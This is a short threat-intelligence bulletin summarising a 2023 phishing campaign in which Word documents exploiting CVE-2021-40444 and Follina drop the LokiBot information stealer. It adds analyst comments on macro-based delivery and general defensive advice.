Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware

Cyber Security Threat Summary:
“Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems. ‘LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. ‘It primarily targets Windows systems and aims to gather sensitive information from infected machines. The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution. The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot. The injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment” (The Hacker News, 2023).

Security Officer Comments:
Researchers at FortiGuard Labs uncovered another document in May, which contains an embedded VBA script that is designed to automatically execute by leveraging the “Auto_Open” and “Document_Open” functions, further launching the final payload, LockiBot. For its part, LockiBot is designed to gather information from various sources on the targeted system, including web browsers, FTP, email, and numerous software that have been installed. According to FortiGuard Labs, LockiBot has been active for several years now, with the authors continuously updating the info-stealer to make it easier for cybercriminals to steal data from victims. The operators are also looking for more efficient ways to spread and infect systems, typically leveraging various vulnerabilities and employing VBA macros to launch their attacks.

Suggested Correction(s):
(Fortinet) To protect themselves, users should exercise caution when dealing with any Office documents or unknown files, especially those that contain links to external websites. It is essential to be vigilant and avoid clicking on suspicious links or opening attachments from untrusted sources. Additionally, keeping the software and operating systems up to date with the latest security patches can help mitigate the risk of exploitation by malware.

Link(s):
https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html
https://www.fortinet.com/blog/